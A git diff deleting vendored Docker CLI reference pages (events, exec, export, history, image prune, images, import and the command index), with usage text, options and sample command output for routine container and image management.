JSON Lines, please refer to http://jsonlines.org/ . - -## Examples - -You'll need two shells for this example. - -**Shell 1: Listening for events:** - - $ docker events - -**Shell 2: Start and Stop containers:** - - $ docker start 4386fb97867d - $ docker stop 4386fb97867d - $ docker stop 7805c1d35632 - -**Shell 1: (Again .. now showing events):** - - 2015-05-12T11:51:30.999999999Z07:00 container start 4386fb97867d (image=ubuntu-1:14.04) - 2015-05-12T11:51:30.999999999Z07:00 container die 4386fb97867d (image=ubuntu-1:14.04) - 2015-05-12T15:52:12.999999999Z07:00 container stop 4386fb97867d (image=ubuntu-1:14.04) - 2015-05-12T15:53:45.999999999Z07:00 container die 7805c1d35632 (image=redis:2.8) - 2015-05-12T15:54:03.999999999Z07:00 container stop 7805c1d35632 (image=redis:2.8) - -**Show events in the past from a specified time:** - - $ docker events --since 1378216169 - 2015-05-12T11:51:30.999999999Z07:00 container die 4386fb97867d (image=ubuntu-1:14.04) - 2015-05-12T15:52:12.999999999Z07:00 container stop 4386fb97867d (image=ubuntu-1:14.04) - 2015-05-12T15:53:45.999999999Z07:00 container die 7805c1d35632 (image=redis:2.8) - 2015-05-12T15:54:03.999999999Z07:00 container stop 7805c1d35632 (image=redis:2.8) - - $ docker events --since '2013-09-03' - 2015-05-12T11:51:30.999999999Z07:00 container start 4386fb97867d (image=ubuntu-1:14.04) - 2015-05-12T11:51:30.999999999Z07:00 container die 4386fb97867d (image=ubuntu-1:14.04) - 2015-05-12T15:52:12.999999999Z07:00 container stop 4386fb97867d (image=ubuntu-1:14.04) - 2015-05-12T15:53:45.999999999Z07:00 container die 7805c1d35632 (image=redis:2.8) - 2015-05-12T15:54:03.999999999Z07:00 container stop 7805c1d35632 (image=redis:2.8) - - $ docker events --since '2013-09-03T15:49:29' - 2015-05-12T11:51:30.999999999Z07:00 container die 4386fb97867d (image=ubuntu-1:14.04) - 2015-05-12T15:52:12.999999999Z07:00 container stop 4386fb97867d (image=ubuntu-1:14.04) - 2015-05-12T15:53:45.999999999Z07:00 container die 7805c1d35632 (image=redis:2.8) - 2015-05-12T15:54:03.999999999Z07:00 container stop 7805c1d35632 (image=redis:2.8) - -This example outputs all events that were generated in the last 3 minutes, -relative to the current time on the client machine: - - $ docker events --since '3m' - 2015-05-12T11:51:30.999999999Z07:00 container die 4386fb97867d (image=ubuntu-1:14.04) - 2015-05-12T15:52:12.999999999Z07:00 container stop 4386fb97867d (image=ubuntu-1:14.04) - 2015-05-12T15:53:45.999999999Z07:00 container die 7805c1d35632 (image=redis:2.8) - 2015-05-12T15:54:03.999999999Z07:00 container stop 7805c1d35632 (image=redis:2.8) - -**Filter events:** - - $ docker events --filter 'event=stop' - 2014-05-10T17:42:14.999999999Z07:00 container stop 4386fb97867d (image=ubuntu-1:14.04) - 2014-09-03T17:42:14.999999999Z07:00 container stop 7805c1d35632 (image=redis:2.8) - - $ docker events --filter 'image=ubuntu-1:14.04' - 2014-05-10T17:42:14.999999999Z07:00 container start 4386fb97867d (image=ubuntu-1:14.04) - 2014-05-10T17:42:14.999999999Z07:00 container die 4386fb97867d (image=ubuntu-1:14.04) - 2014-05-10T17:42:14.999999999Z07:00 container stop 4386fb97867d (image=ubuntu-1:14.04) - - $ docker events --filter 'container=7805c1d35632' - 2014-05-10T17:42:14.999999999Z07:00 container die 7805c1d35632 (image=redis:2.8) - 2014-09-03T15:49:29.999999999Z07:00 container stop 7805c1d35632 (image= redis:2.8) - - $ docker events --filter 'container=7805c1d35632' --filter 'container=4386fb97867d' - 2014-09-03T15:49:29.999999999Z07:00 container die 4386fb97867d (image=ubuntu-1:14.04) - 2014-05-10T17:42:14.999999999Z07:00 container stop 4386fb97867d (image=ubuntu-1:14.04) - 2014-05-10T17:42:14.999999999Z07:00 container die 7805c1d35632 (image=redis:2.8) - 2014-09-03T15:49:29.999999999Z07:00 container stop 7805c1d35632 (image=redis:2.8) - - $ docker events --filter 'container=7805c1d35632' --filter 'event=stop' - 2014-09-03T15:49:29.999999999Z07:00 container stop 7805c1d35632 (image=redis:2.8) - - $ docker events --filter 'container=container_1' --filter 'container=container_2' - 2014-09-03T15:49:29.999999999Z07:00 container die 4386fb97867d (image=ubuntu-1:14.04) - 2014-05-10T17:42:14.999999999Z07:00 container stop 4386fb97867d (image=ubuntu-1:14.04) - 2014-05-10T17:42:14.999999999Z07:00 container die 7805c1d35632 (imager=redis:2.8) - 2014-09-03T15:49:29.999999999Z07:00 container stop 7805c1d35632 (image=redis:2.8) - - $ docker events --filter 'type=volume' - 2015-12-23T21:05:28.136212689Z volume create test-event-volume-local (driver=local) - 2015-12-23T21:05:28.383462717Z volume mount test-event-volume-local (read/write=true, container=562fe10671e9273da25eed36cdce26159085ac7ee6707105fd534866340a5025, destination=/foo, driver=local, propagation=rprivate) - 2015-12-23T21:05:28.650314265Z volume unmount test-event-volume-local (container=562fe10671e9273da25eed36cdce26159085ac7ee6707105fd534866340a5025, driver=local) - 2015-12-23T21:05:28.716218405Z volume destroy test-event-volume-local (driver=local) - - $ docker events --filter 'type=network' - 2015-12-23T21:38:24.705709133Z network create 8b111217944ba0ba844a65b13efcd57dc494932ee2527577758f939315ba2c5b (name=test-event-network-local, type=bridge) - 2015-12-23T21:38:25.119625123Z network connect 8b111217944ba0ba844a65b13efcd57dc494932ee2527577758f939315ba2c5b (name=test-event-network-local, container=b4be644031a3d90b400f88ab3d4bdf4dc23adb250e696b6328b85441abe2c54e, type=bridge) - - $ docker events --filter 'type=plugin' (experimental) - 2016-07-25T17:30:14.825557616Z plugin pull ec7b87f2ce84330fe076e666f17dfc049d2d7ae0b8190763de94e1f2d105993f (name=tiborvass/sample-volume-plugin:latest) - 2016-07-25T17:30:14.888127370Z plugin enable ec7b87f2ce84330fe076e666f17dfc049d2d7ae0b8190763de94e1f2d105993f (name=tiborvass/sample-volume-plugin:latest) - -**Format:** - - $ docker events --filter 'type=container' --format 'Type={{.Type}} Status={{.Status}} ID={{.ID}}' - Type=container Status=create ID=2ee349dac409e97974ce8d01b70d250b85e0ba8189299c126a87812311951e26 - Type=container Status=attach ID=2ee349dac409e97974ce8d01b70d250b85e0ba8189299c126a87812311951e26 - Type=container Status=start ID=2ee349dac409e97974ce8d01b70d250b85e0ba8189299c126a87812311951e26 - Type=container Status=resize ID=2ee349dac409e97974ce8d01b70d250b85e0ba8189299c126a87812311951e26 - Type=container Status=die ID=2ee349dac409e97974ce8d01b70d250b85e0ba8189299c126a87812311951e26 - Type=container Status=destroy ID=2ee349dac409e97974ce8d01b70d250b85e0ba8189299c126a87812311951e26 - -**Format (as JSON Lines):** - - $ docker events --format '{{json .}}' - {"status":"create","id":"196016a57679bf42424484918746a9474cd905dd993c4d0f4.. - {"status":"attach","id":"196016a57679bf42424484918746a9474cd905dd993c4d0f4.. - {"Type":"network","Action":"connect","Actor":{"ID":"1b50a5bf755f6021dfa78e.. - {"status":"start","id":"196016a57679bf42424484918746a9474cd905dd993c4d0f42.. - {"status":"resize","id":"196016a57679bf42424484918746a9474cd905dd993c4d0f4.. diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/exec.md b/vendor/github.com/docker/docker/docs/reference/commandline/exec.md deleted file mode 100644 index 38891c9ea0..0000000000 --- a/vendor/github.com/docker/docker/docs/reference/commandline/exec.md +++ /dev/null @@ -1,65 +0,0 @@ ---- -title: "exec" -description: "The exec command description and usage" -keywords: "command, container, run, execute" ---- - - - -# exec - -```markdown -Usage: docker exec [OPTIONS] CONTAINER COMMAND [ARG...] - -Run a command in a running container - -Options: - -d, --detach Detached mode: run command in the background - --detach-keys Override the key sequence for detaching a container - -e, --env=[] Set environment variables - --help Print usage - -i, --interactive Keep STDIN open even if not attached - --privileged Give extended privileges to the command - -t, --tty Allocate a pseudo-TTY - -u, --user Username or UID (format: [:]) -``` - -The `docker exec` command runs a new command in a running container. - -The command started using `docker exec` only runs while the container's primary -process (`PID 1`) is running, and it is not restarted if the container is -restarted. - -If the container is paused, then the `docker exec` command will fail with an error: - - $ docker pause test - test - $ docker ps - CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES - 1ae3b36715d2 ubuntu:latest "bash" 17 seconds ago Up 16 seconds (Paused) test - $ docker exec test ls - FATA[0000] Error response from daemon: Container test is paused, unpause the container before exec - $ echo $? - 1 - -## Examples - - $ docker run --name ubuntu_bash --rm -i -t ubuntu bash - -This will create a container named `ubuntu_bash` and start a Bash session. - - $ docker exec -d ubuntu_bash touch /tmp/execWorks - -This will create a new file `/tmp/execWorks` inside the running container -`ubuntu_bash`, in the background. - - $ docker exec -it ubuntu_bash bash - -This will create a new Bash session in the container `ubuntu_bash`. diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/export.md b/vendor/github.com/docker/docker/docs/reference/commandline/export.md deleted file mode 100644 index 1004fc30c0..0000000000 --- a/vendor/github.com/docker/docker/docs/reference/commandline/export.md +++ /dev/null @@ -1,43 +0,0 @@ ---- -title: "export" -description: "The export command description and usage" -keywords: "export, file, system, container" ---- - - - -# export - -```markdown -Usage: docker export [OPTIONS] CONTAINER - -Export a container's filesystem as a tar archive - -Options: - --help Print usage - -o, --output string Write to a file, instead of STDOUT -``` - -The `docker export` command does not export the contents of volumes associated -with the container. If a volume is mounted on top of an existing directory in -the container, `docker export` will export the contents of the *underlying* -directory, not the contents of the volume. - -Refer to [Backup, restore, or migrate data -volumes](https://docs.docker.com/engine/tutorials/dockervolumes/#backup-restore-or-migrate-data-volumes) in -the user guide for examples on exporting data in a volume. - -## Examples - - $ docker export red_panda > latest.tar - -Or - - $ docker export --output="latest.tar" red_panda diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/history.md b/vendor/github.com/docker/docker/docs/reference/commandline/history.md deleted file mode 100644 index 00f88db35b..0000000000 --- a/vendor/github.com/docker/docker/docs/reference/commandline/history.md +++ /dev/null @@ -1,48 +0,0 @@ ---- -title: "history" -description: "The history command description and usage" -keywords: "docker, image, history" ---- - - - -# history - -```markdown -Usage: docker history [OPTIONS] IMAGE - -Show the history of an image - -Options: - --help Print usage - -H, --human Print sizes and dates in human readable format (default true) - --no-trunc Don't truncate output - -q, --quiet Only show numeric IDs -``` - -To see how the `docker:latest` image was built: - - $ docker history docker - IMAGE CREATED CREATED BY SIZE COMMENT - 3e23a5875458 8 days ago /bin/sh -c #(nop) ENV LC_ALL=C.UTF-8 0 B - 8578938dd170 8 days ago /bin/sh -c dpkg-reconfigure locales && loc 1.245 MB - be51b77efb42 8 days ago /bin/sh -c apt-get update && apt-get install 338.3 MB - 4b137612be55 6 weeks ago /bin/sh -c #(nop) ADD jessie.tar.xz in / 121 MB - 750d58736b4b 6 weeks ago /bin/sh -c #(nop) MAINTAINER Tianon Gravi - -# image prune - -```markdown -Usage: docker image prune [OPTIONS] - -Remove unused images - -Options: - -a, --all Remove all unused images, not just dangling ones - -f, --force Do not prompt for confirmation - --help Print usage -``` - -Remove all dangling images. If `-a` is specified, will also remove all images not referenced by any container. - -Example output: - -```bash -$ docker image prune -a -WARNING! This will remove all images without at least one container associated to them. -Are you sure you want to continue? [y/N] y -Deleted Images: -untagged: alpine:latest -untagged: alpine@sha256:3dcdb92d7432d56604d4545cbd324b14e647b313626d99b889d0626de158f73a -deleted: sha256:4e38e38c8ce0b8d9041a9c4fefe786631d1416225e13b0bfe8cfa2321aec4bba -deleted: sha256:4fe15f8d0ae69e169824f25f1d4da3015a48feeeeebb265cd2e328e15c6a869f -untagged: alpine:3.3 -untagged: alpine@sha256:4fa633f4feff6a8f02acfc7424efd5cb3e76686ed3218abf4ca0fa4a2a358423 -untagged: my-jq:latest -deleted: sha256:ae67841be6d008a374eff7c2a974cde3934ffe9536a7dc7ce589585eddd83aff -deleted: sha256:34f6f1261650bc341eb122313372adc4512b4fceddc2a7ecbb84f0958ce5ad65 -deleted: sha256:cf4194e8d8db1cb2d117df33f2c75c0369c3a26d96725efb978cc69e046b87e7 -untagged: my-curl:latest -deleted: sha256:b2789dd875bf427de7f9f6ae001940073b3201409b14aba7e5db71f408b8569e -deleted: sha256:96daac0cb203226438989926fc34dd024f365a9a8616b93e168d303cfe4cb5e9 -deleted: sha256:5cbd97a14241c9cd83250d6b6fc0649833c4a3e84099b968dd4ba403e609945e -deleted: sha256:a0971c4015c1e898c60bf95781c6730a05b5d8a2ae6827f53837e6c9d38efdec -deleted: sha256:d8359ca3b681cc5396a4e790088441673ed3ce90ebc04de388bfcd31a0716b06 -deleted: sha256:83fc9ba8fb70e1da31dfcc3c88d093831dbd4be38b34af998df37e8ac538260c -deleted: sha256:ae7041a4cc625a9c8e6955452f7afe602b401f662671cea3613f08f3d9343b35 -deleted: sha256:35e0f43a37755b832f0bbea91a2360b025ee351d7309dae0d9737bc96b6d0809 -deleted: sha256:0af941dd29f00e4510195dd00b19671bc591e29d1495630e7e0f7c44c1e6a8c0 -deleted: sha256:9fc896fc2013da84f84e45b3096053eb084417b42e6b35ea0cce5a3529705eac -deleted: sha256:47cf20d8c26c46fff71be614d9f54997edacfe8d46d51769706e5aba94b16f2b -deleted: sha256:2c675ee9ed53425e31a13e3390bf3f539bf8637000e4bcfbb85ee03ef4d910a1 - -Total reclaimed space: 16.43 MB -``` - -## Related information - -* [system df](system_df.md) -* [container prune](container_prune.md) -* [volume prune](volume_prune.md) -* [network prune](network_prune.md) -* [system prune](system_prune.md) diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/images.md b/vendor/github.com/docker/docker/docs/reference/commandline/images.md deleted file mode 100644 index 3b9ea1fe17..0000000000 --- a/vendor/github.com/docker/docker/docs/reference/commandline/images.md +++ /dev/null @@ -1,304 +0,0 @@ ---- -title: "images" -description: "The images command description and usage" -keywords: "list, docker, images" ---- - - - -# images - -```markdown -Usage: docker images [OPTIONS] [REPOSITORY[:TAG]] - -List images - -Options: - -a, --all Show all images (default hides intermediate images) - --digests Show digests - -f, --filter value Filter output based on conditions provided (default []) - - dangling=(true|false) - - label= or label== - - before=([:tag]||) - - since=([:tag]||) - - reference=(pattern of an image reference) - --format string Pretty-print images using a Go template - --help Print usage - --no-trunc Don't truncate output - -q, --quiet Only show numeric IDs -``` - -The default `docker images` will show all top level -images, their repository and tags, and their size. - -Docker images have intermediate layers that increase reusability, -decrease disk usage, and speed up `docker build` by -allowing each step to be cached. These intermediate layers are not shown -by default. - -The `SIZE` is the cumulative space taken up by the image and all -its parent images. This is also the disk space used by the contents of the -Tar file created when you `docker save` an image. - -An image will be listed more than once if it has multiple repository names -or tags. This single image (identifiable by its matching `IMAGE ID`) -uses up the `SIZE` listed only once. - -### Listing the most recently created images - - $ docker images - REPOSITORY TAG IMAGE ID CREATED SIZE - 77af4d6b9913 19 hours ago 1.089 GB - committ latest b6fa739cedf5 19 hours ago 1.089 GB - 78a85c484f71 19 hours ago 1.089 GB - docker latest 30557a29d5ab 20 hours ago 1.089 GB - 5ed6274db6ce 24 hours ago 1.089 GB - postgres 9 746b819f315e 4 days ago 213.4 MB - postgres 9.3 746b819f315e 4 days ago 213.4 MB - postgres 9.3.5 746b819f315e 4 days ago 213.4 MB - postgres latest 746b819f315e 4 days ago 213.4 MB - -### Listing images by name and tag - -The `docker images` command takes an optional `[REPOSITORY[:TAG]]` argument -that restricts the list to images that match the argument. If you specify -`REPOSITORY`but no `TAG`, the `docker images` command lists all images in the -given repository. - -For example, to list all images in the "java" repository, run this command : - - $ docker images java - REPOSITORY TAG IMAGE ID CREATED SIZE - java 8 308e519aac60 6 days ago 824.5 MB - java 7 493d82594c15 3 months ago 656.3 MB - java latest 2711b1d6f3aa 5 months ago 603.9 MB - -The `[REPOSITORY[:TAG]]` value must be an "exact match". This means that, for example, -`docker images jav` does not match the image `java`. - -If both `REPOSITORY` and `TAG` are provided, only images matching that -repository and tag are listed. To find all local images in the "java" -repository with tag "8" you can use: - - $ docker images java:8 - REPOSITORY TAG IMAGE ID CREATED SIZE - java 8 308e519aac60 6 days ago 824.5 MB - -If nothing matches `REPOSITORY[:TAG]`, the list is empty. - - $ docker images java:0 - REPOSITORY TAG IMAGE ID CREATED SIZE - -## Listing the full length image IDs - - $ docker images --no-trunc - REPOSITORY TAG IMAGE ID CREATED SIZE - sha256:77af4d6b9913e693e8d0b4b294fa62ade6054e6b2f1ffb617ac955dd63fb0182 19 hours ago 1.089 GB - committest latest sha256:b6fa739cedf5ea12a620a439402b6004d057da800f91c7524b5086a5e4749c9f 19 hours ago 1.089 GB - sha256:78a85c484f71509adeaace20e72e941f6bdd2b25b4c75da8693efd9f61a37921 19 hours ago 1.089 GB - docker latest sha256:30557a29d5abc51e5f1d5b472e79b7e296f595abcf19fe6b9199dbbc809c6ff4 20 hours ago 1.089 GB - sha256:0124422dd9f9cf7ef15c0617cda3931ee68346455441d66ab8bdc5b05e9fdce5 20 hours ago 1.089 GB - sha256:18ad6fad340262ac2a636efd98a6d1f0ea775ae3d45240d3418466495a19a81b 22 hours ago 1.082 GB - sha256:f9f1e26352f0a3ba6a0ff68167559f64f3e21ff7ada60366e2d44a04befd1d3a 23 hours ago 1.089 GB - tryout latest sha256:2629d1fa0b81b222fca63371ca16cbf6a0772d07759ff80e8d1369b926940074 23 hours ago 131.5 MB - sha256:5ed6274db6ceb2397844896966ea239290555e74ef307030ebb01ff91b1914df 24 hours ago 1.089 GB - -## Listing image digests - -Images that use the v2 or later format have a content-addressable identifier -called a `digest`. As long as the input used to generate the image is -unchanged, the digest value is predictable. To list image digest values, use -the `--digests` flag: - - $ docker images --digests - REPOSITORY TAG DIGEST IMAGE ID CREATED SIZE - localhost:5000/test/busybox sha256:cbbf2f9a99b47fc460d422812b6a5adff7dfee951d8fa2e4a98caa0382cfbdbf 4986bf8c1536 9 weeks ago 2.43 MB - -When pushing or pulling to a 2.0 registry, the `push` or `pull` command -output includes the image digest. You can `pull` using a digest value. You can -also reference by digest in `create`, `run`, and `rmi` commands, as well as the -`FROM` image reference in a Dockerfile. - -## Filtering - -The filtering flag (`-f` or `--filter`) format is of "key=value". If there is more -than one filter, then pass multiple flags (e.g., `--filter "foo=bar" --filter "bif=baz"`) - -The currently supported filters are: - -* dangling (boolean - true or false) -* label (`label=` or `label==`) -* before (`[:]`, `` or ``) - filter images created before given id or references -* since (`[:]`, `` or ``) - filter images created since given id or references - -##### Untagged images (dangling) - - $ docker images --filter "dangling=true" - - REPOSITORY TAG IMAGE ID CREATED SIZE - 8abc22fbb042 4 weeks ago 0 B - 48e5f45168b9 4 weeks ago 2.489 MB - bf747efa0e2f 4 weeks ago 0 B - 980fe10e5736 12 weeks ago 101.4 MB - dea752e4e117 12 weeks ago 101.4 MB - 511136ea3c5a 8 months ago 0 B - -This will display untagged images, that are the leaves of the images tree (not -intermediary layers). These images occur when a new build of an image takes the -`repo:tag` away from the image ID, leaving it as `:` or untagged. -A warning will be issued if trying to remove an image when a container is presently -using it. By having this flag it allows for batch cleanup. - -Ready for use by `docker rmi ...`, like: - - $ docker rmi $(docker images -f "dangling=true" -q) - - 8abc22fbb042 - 48e5f45168b9 - bf747efa0e2f - 980fe10e5736 - dea752e4e117 - 511136ea3c5a - -NOTE: Docker will warn you if any containers exist that are using these untagged images. - - -##### Labeled images - -The `label` filter matches images based on the presence of a `label` alone or a `label` and a -value. - -The following filter matches images with the `com.example.version` label regardless of its value. - - $ docker images --filter "label=com.example.version" - - REPOSITORY TAG IMAGE ID CREATED SIZE - match-me-1 latest eeae25ada2aa About a minute ago 188.3 MB - match-me-2 latest dea752e4e117 About a minute ago 188.3 MB - -The following filter matches images with the `com.example.version` label with the `1.0` value. - - $ docker images --filter "label=com.example.version=1.0" - REPOSITORY TAG IMAGE ID CREATED SIZE - match-me latest 511136ea3c5a About a minute ago 188.3 MB - -In this example, with the `0.1` value, it returns an empty set because no matches were found. - - $ docker images --filter "label=com.example.version=0.1" - REPOSITORY TAG IMAGE ID CREATED SIZE - -#### Before - -The `before` filter shows only images created before the image with -given id or reference. For example, having these images: - - $ docker images - REPOSITORY TAG IMAGE ID CREATED SIZE - image1 latest eeae25ada2aa 4 minutes ago 188.3 MB - image2 latest dea752e4e117 9 minutes ago 188.3 MB - image3 latest 511136ea3c5a 25 minutes ago 188.3 MB - -Filtering with `before` would give: - - $ docker images --filter "before=image1" - REPOSITORY TAG IMAGE ID CREATED SIZE - image2 latest dea752e4e117 9 minutes ago 188.3 MB - image3 latest 511136ea3c5a 25 minutes ago 188.3 MB - -#### Since - -The `since` filter shows only images created after the image with -given id or reference. For example, having these images: - - $ docker images - REPOSITORY TAG IMAGE ID CREATED SIZE - image1 latest eeae25ada2aa 4 minutes ago 188.3 MB - image2 latest dea752e4e117 9 minutes ago 188.3 MB - image3 latest 511136ea3c5a 25 minutes ago 188.3 MB - -Filtering with `since` would give: - - $ docker images --filter "since=image3" - REPOSITORY TAG IMAGE ID CREATED SIZE - image1 latest eeae25ada2aa 4 minutes ago 188.3 MB - image2 latest dea752e4e117 9 minutes ago 188.3 MB - -#### Reference - -The `reference` filter shows only images whose reference matches -the specified pattern. - - $ docker images - REPOSITORY TAG IMAGE ID CREATED SIZE - busybox latest e02e811dd08f 5 weeks ago 1.09 MB - busybox uclibc e02e811dd08f 5 weeks ago 1.09 MB - busybox musl 733eb3059dce 5 weeks ago 1.21 MB - busybox glibc 21c16b6787c6 5 weeks ago 4.19 MB - -Filtering with `reference` would give: - - $ docker images --filter=reference='busy*:*libc' - REPOSITORY TAG IMAGE ID CREATED SIZE - busybox uclibc e02e811dd08f 5 weeks ago 1.09 MB - busybox glibc 21c16b6787c6 5 weeks ago 4.19 MB - -## Formatting - -The formatting option (`--format`) will pretty print container output -using a Go template. - -Valid placeholders for the Go template are listed below: - -Placeholder | Description ----- | ---- -`.ID` | Image ID -`.Repository` | Image repository -`.Tag` | Image tag -`.Digest` | Image digest -`.CreatedSince` | Elapsed time since the image was created -`.CreatedAt` | Time when the image was created -`.Size` | Image disk size - -When using the `--format` option, the `image` command will either -output the data exactly as the template declares or, when using the -`table` directive, will include column headers as well. - -The following example uses a template without headers and outputs the -`ID` and `Repository` entries separated by a colon for all images: - - {% raw %} - $ docker images --format "{{.ID}}: {{.Repository}}" - 77af4d6b9913: - b6fa739cedf5: committ - 78a85c484f71: - 30557a29d5ab: docker - 5ed6274db6ce: - 746b819f315e: postgres - 746b819f315e: postgres - 746b819f315e: postgres - 746b819f315e: postgres - {% endraw %} - -To list all images with their repository and tag in a table format you -can use: - - {% raw %} - $ docker images --format "table {{.ID}}\t{{.Repository}}\t{{.Tag}}" - IMAGE ID REPOSITORY TAG - 77af4d6b9913 - b6fa739cedf5 committ latest - 78a85c484f71 - 30557a29d5ab docker latest - 5ed6274db6ce - 746b819f315e postgres 9 - 746b819f315e postgres 9.3 - 746b819f315e postgres 9.3.5 - 746b819f315e postgres latest - {% endraw %} diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/import.md b/vendor/github.com/docker/docker/docs/reference/commandline/import.md deleted file mode 100644 index 20e90a61fd..0000000000 --- a/vendor/github.com/docker/docker/docs/reference/commandline/import.md +++ /dev/null @@ -1,75 +0,0 @@ ---- -title: "import" -description: "The import command description and usage" -keywords: "import, file, system, container" ---- - - - -# import - -```markdown -Usage: docker import [OPTIONS] file|URL|- [REPOSITORY[:TAG]] - -Import the contents from a tarball to create a filesystem image - -Options: - -c, --change value Apply Dockerfile instruction to the created image (default []) - --help Print usage - -m, --message string Set commit message for imported image -``` - -You can specify a `URL` or `-` (dash) to take data directly from `STDIN`. The -`URL` can point to an archive (.tar, .tar.gz, .tgz, .bzip, .tar.xz, or .txz) -containing a filesystem or to an individual file on the Docker host. If you -specify an archive, Docker untars it in the container relative to the `/` -(root). If you specify an individual file, you must specify the full path within -the host. To import from a remote location, specify a `URI` that begins with the -`http://` or `https://` protocol. - -The `--change` option will apply `Dockerfile` instructions to the image -that is created. -Supported `Dockerfile` instructions: -`CMD`|`ENTRYPOINT`|`ENV`|`EXPOSE`|`ONBUILD`|`USER`|`VOLUME`|`WORKDIR` - -## Examples - -**Import from a remote location:** - -This will create a new untagged image. - - $ docker import http://example.com/exampleimage.tgz - -**Import from a local file:** - -Import to docker via pipe and `STDIN`. - - $ cat exampleimage.tgz | docker import - exampleimagelocal:new - -Import with a commit message. - - $ cat exampleimage.tgz | docker import --message "New image imported from tarball" - exampleimagelocal:new - -Import to docker from a local archive. - - $ docker import /path/to/exampleimage.tgz - -**Import from a local directory:** - - $ sudo tar -c . | docker import - exampleimagedir - -**Import from a local directory with new configurations:** - - $ sudo tar -c . | docker import --change "ENV DEBUG true" - exampleimagedir - -Note the `sudo` in this example – you must preserve -the ownership of the files (especially root ownership) during the -archiving with tar. If you are not root (or the sudo command) when you -tar, then the ownerships might not get preserved. diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/index.md b/vendor/github.com/docker/docker/docs/reference/commandline/index.md deleted file mode 100644 index 952fa09df1..0000000000 --- a/vendor/github.com/docker/docker/docs/reference/commandline/index.md +++ /dev/null @@ -1,178 +0,0 @@ ---- -title: "Docker commands" -description: "Docker's CLI command description and usage" -keywords: "Docker, Docker documentation, CLI, command line" -identifier: "smn_cli_guide" ---- - - - -# The Docker commands - -This section contains reference information on using Docker's command line -client. Each command has a reference page along with samples. If you are -unfamiliar with the command line, you should start by reading about how to [Use -the Docker command line](cli.md). - -You start the Docker daemon with the command line. How you start the daemon -affects your Docker containers. For that reason you should also make sure to -read the [`dockerd`](dockerd.md) reference page. - -### Docker management commands - -| Command | Description | -|:--------|:-------------------------------------------------------------------| -| [dockerd](dockerd.md) | Launch the Docker daemon | -| [info](info.md) | Display system-wide information | -| [inspect](inspect.md)| Return low-level information on a container or image | -| [version](version.md) | Show the Docker version information | - - -### Image commands - -| Command | Description | -|:--------|:-------------------------------------------------------------------| -| [build](build.md) | Build an image from a Dockerfile | -| [commit](commit.md) | Create a new image from a container's changes | -| [history](history.md) | Show the history of an image | -| [images](images.md) | List images | -| [import](import.md) | Import the contents from a tarball to create a filesystem image | -| [load](load.md) | Load an image from a tar archive or STDIN | -| [rmi](rmi.md) | Remove one or more images | -| [save](save.md) | Save images to a tar archive | -| [tag](tag.md) | Tag an image into a repository | - -### Container commands - -| Command | Description | -|:--------|:-------------------------------------------------------------------| -| [attach](attach.md) | Attach to a running container | -| [cp](cp.md) | Copy files/folders from a container to a HOSTDIR or to STDOUT | -| [create](create.md) | Create a new container | -| [diff](diff.md) | Inspect changes on a container's filesystem | -| [events](events.md) | Get real time events from the server | -| [exec](exec.md) | Run a command in a running container | -| [export](export.md) | Export a container's filesystem as a tar archive | -| [kill](kill.md) | Kill a running container | -| [logs](logs.md) | Fetch the logs of a container | -| [pause](pause.md) | Pause all processes within a container | -| [port](port.md) | List port mappings or a specific mapping for the container | -| [ps](ps.md) | List containers | -| [rename](rename.md) | Rename a container | -| [restart](restart.md) | Restart a running container | -| [rm](rm.md) | Remove one or more containers | -| [run](run.md) | Run a command in a new container | -| [start](start.md) | Start one or more stopped containers | -| [stats](stats.md) | Display a live stream of container(s) resource usage statistics | -| [stop](stop.md) | Stop a running container | -| [top](top.md) | Display the running processes of a container | -| [unpause](unpause.md) | Unpause all processes within a container | -| [update](update.md) | Update configuration of one or more containers | -| [wait](wait.md) | Block until a container stops, then print its exit code | - -### Hub and registry commands - -| Command | Description | -|:--------|:-------------------------------------------------------------------| -| [login](login.md) | Register or log in to a Docker registry | -| [logout](logout.md) | Log out from a Docker registry | -| [pull](pull.md) | Pull an image or a repository from a Docker registry | -| [push](push.md) | Push an image or a repository to a Docker registry | -| [search](search.md) | Search the Docker Hub for images | - -### Network and connectivity commands - -| Command | Description | -|:--------|:-------------------------------------------------------------------| -| [network connect](network_connect.md) | Connect a container to a network | -| [network create](network_create.md) | Create a new network | -| [network disconnect](network_disconnect.md) | Disconnect a container from a network | -| [network inspect](network_inspect.md) | Display information about a network | -| [network ls](network_ls.md) | Lists all the networks the Engine `daemon` knows about | -| [network rm](network_rm.md) | Removes one or more networks | - - -### Shared data volume commands - -| Command | Description | -|:--------|:-------------------------------------------------------------------| -| [volume create](volume_create.md) | Creates a new volume where containers can consume and store data | -| [volume inspect](volume_inspect.md) | Display information about a volume | -| [volume ls](volume_ls.md) | Lists all the volumes Docker knows about | -| [volume prune](volume_prune.md) | Remove all unused volumes | -| [volume rm](volume_rm.md) | Remove one or more volumes | - - -### Swarm node commands - -| Command | Description | -|:--------|:-------------------------------------------------------------------| -| [node promote](node_promote.md) | Promote a node that is pending a promotion to manager | -| [node demote](node_demote.md) | Demotes an existing manager so that it is no longer a manager | -| [node inspect](node_inspect.md) | Inspect a node in the swarm | -| [node update](node_update.md) | Update attributes for a node | -| [node ps](node_ps.md) | List tasks running on one or more nodes | -| [node ls](node_ls.md) | List nodes in the swarm | -| [node rm](node_rm.md) | Remove one or more nodes from the swarm | - -### Swarm swarm commands - -| Command | Description | -|:--------|:-------------------------------------------------------------------| -| [swarm init](swarm_init.md) | Initialize a swarm | -| [swarm join](swarm_join.md) | Join a swarm as a manager node or worker node | -| [swarm leave](swarm_leave.md) | Remove the current node from the swarm | -| [swarm update](swarm_update.md) | Update attributes of a swarm | -| [swarm join-token](swarm_join_token.md) | Display or rotate join tokens | - -### Swarm service commands - -| Command | Description | -|:--------|:-------------------------------------------------------------------| -| [service create](service_create.md) | Create a new service | -| [service inspect](service_inspect.md) | Inspect a service | -| [service ls](service_ls.md) | List services in the swarm | -| [service rm](service_rm.md) | Remove a service from the swarm | -| [service scale](service_scale.md) | Set the number of replicas for the desired state of the service | -| [service ps](service_ps.md) | List the tasks of a service | -| [service update](service_update.md) | Update the attributes of a service | - -### Swarm secret commands - -| Command | Description | -|:--------|:-------------------------------------------------------------------| -| [secret create](secret_create.md) | Create a secret from a file or STDIN as content | -| [secret inspect](service_inspect.md) | Inspect the specified secret | -| 